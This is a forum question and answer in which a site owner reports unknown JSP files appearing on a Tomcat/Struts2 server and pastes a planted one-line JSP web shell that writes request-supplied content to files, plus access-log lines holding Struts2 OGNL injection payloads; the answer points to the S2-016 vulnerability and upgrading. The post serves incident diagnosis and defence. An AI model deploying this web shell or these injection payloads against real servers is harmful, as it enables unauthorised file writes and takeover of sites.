Tomcat Files Getting uploaded - Security Loophole

1.7k views Asked by At

I have a tried hosting a struts2 app on public domain using tomcat 7x with Apache 2.2 fronting tomcat.

I see some malicious activity in my web app folder.

Every time I see some files like indcx.jsp, maneger.jsp, uplod.jsp etc and many such unknown files getting uploaded into tomcat/webapp/application folder.

I manually delete these files every time, but wanted to know if we have any setting or configuration which can avoid such malicious / hacker activity and uploading of such unknown files.

Edit

I have seen such files again and the contents of the file are as below

  <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

My question is how is someone able to upload this file on my server?

Edit Again

After close analysis this looks a struts2 or xwork security issue or vulnerability now, here are all the logs which tell most of the remaining story

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

1

There are 1 answers

0
user3254782 On

Seems like you need to upgrade your struts2. Certain versions are vulnerable to what you're describing: http://struts.apache.org/release/2.3.x/docs/s2-016.html